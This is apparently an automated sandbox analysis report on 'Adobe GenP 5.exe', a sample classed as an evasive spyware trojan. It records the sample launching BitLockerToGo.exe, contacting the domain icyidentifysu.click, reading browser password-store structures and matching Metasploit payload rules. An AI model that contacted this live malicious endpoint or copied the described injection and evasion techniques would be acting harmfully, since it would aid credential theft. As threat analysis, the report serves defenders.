Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Adobe GenP 5.exeString found in binary or memory: https://github.com/zloirock/core-js
            Source: Adobe GenP 5.exeString found in binary or memory: https://github.com/zloirock/core-js/blob/v3.20.3/LICENSE
            Source: BitLockerToGo.exe, 00000003.00000003.2609531929.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.000000000356B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610702949.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609550259.0000000003568000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609186607.00000000035D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/
            Source: BitLockerToGo.exe, 00000003.00000003.2476797050.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/8Nr
            Source: BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/YF
            Source: BitLockerToGo.exe, 00000003.00000003.2493579531.00000000035E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2517419497.000000000356A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/api
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2517419497.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/ck/8Nr
            Source: BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/nF
            Source: BitLockerToGo.exe, 00000003.00000003.2609531929.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610702949.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609186607.00000000035D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/pi
            Source: BitLockerToGo.exe, 00000003.00000003.2609531929.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609186607.00000000035D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/piv
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2425451359.0000000005894000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.000000000356B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2379523620.0000000005889000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609550259.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click:443/api
            Source: BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
            Source: BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49781 version: TLS 1.2

            System Summary

            Source: 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
            Source: 00000000.00000002.2310776898.000000000B000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0042A03C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00435090
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00438110
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040E2D5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_004253A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_004353A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0043C410
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040D49A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00408690
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0042A749
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00420720
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040B9AF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0043CCD0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040CF2B
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00412010
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_004340EF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_004160F1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0041D170
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00409270
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0041C200
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00406230
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_004282E8
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00404300
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0042D32A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00421380
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0042E440
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00426400
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0042B429
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00419490
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_004074A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0041D4B0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00409630
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_004066C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0041D6F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0043C6A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0041876C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040D738
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0041E7F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0041A790
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00434870
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040C830
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_004158D6
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00405940
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00403950
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0043395D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0042A9C4
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_004389F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0043C990
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040A9B0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0041CA40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0042AA62
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00434AD0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00418BE7
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00402B90
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040FC0A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00404C30
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00414D45
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0041CD60
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0042FD60
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00435E40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00414D40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00429ECA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00405E90
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00402F40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00408FE0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00420FA0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 004145B0 appears 76 times
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 00407FE0 appears 76 times
            Source: Adobe GenP 5.exe, 00000000.00000003.2243124589.000000000B168000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs Adobe GenP 5.exe
            Source: Adobe GenP 5.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
            Source: 00000000.00000002.2310776898.000000000B000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
            Source: Adobe GenP 5.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: BitLockerToGo.exe, 00000003.00000003.2357888120.000000000581A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357731348.0000000005837000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2384042731.00000000058B1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2383075935.000000000581C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Adobe GenP 5.exe | Virustotal: Detection: 37%
            Source: Adobe GenP 5.exe | ReversingLabs: Detection: 44%
            Source: Adobe GenP 5.exe | String found in binary or memory: @v1.5.6/loadconfig.go
            Source: unknown | Process created: C:\Users\user\Desktop\Adobe GenP 5.exe "C:\Users\user\Desktop\Adobe GenP 5.exe"
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Section loaded: powrprof.dll
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Section loaded: umpdc.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wldp.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winhttp.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: webio.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mswsock.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winnsi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: sspicli.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: schannel.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: msasn1.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: gpapi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dpapi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: amsi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: userenv.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: profapi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: version.dll
            Source: Adobe GenP 5.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
            Source: Adobe GenP 5.exe | Static file information: File size 14820352 > 1048576
            Source: Adobe GenP 5.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x29f600
            Source: Adobe GenP 5.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2bd200
            Source: Adobe GenP 5.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x862200
            Source: Adobe GenP 5.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: BitLockerToGo.pdb source: Adobe GenP 5.exe, 00000000.00000003.2243124589.000000000B168000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: Adobe GenP 5.exe, 00000000.00000003.2243124589.000000000B168000.00000004.00001000.00020000.00000000.sdmp
            Source: Adobe GenP 5.exe | Static PE information: section name: .symtab
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0043B250 push eax; mov dword ptr [esp], 86858453h | 3_2_0043B253
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | System information queried: FirmwareTableInformation
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5388 | Thread sleep time: -150000s >= -30000s
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5392 | Thread sleep time: -30000s >= -30000s
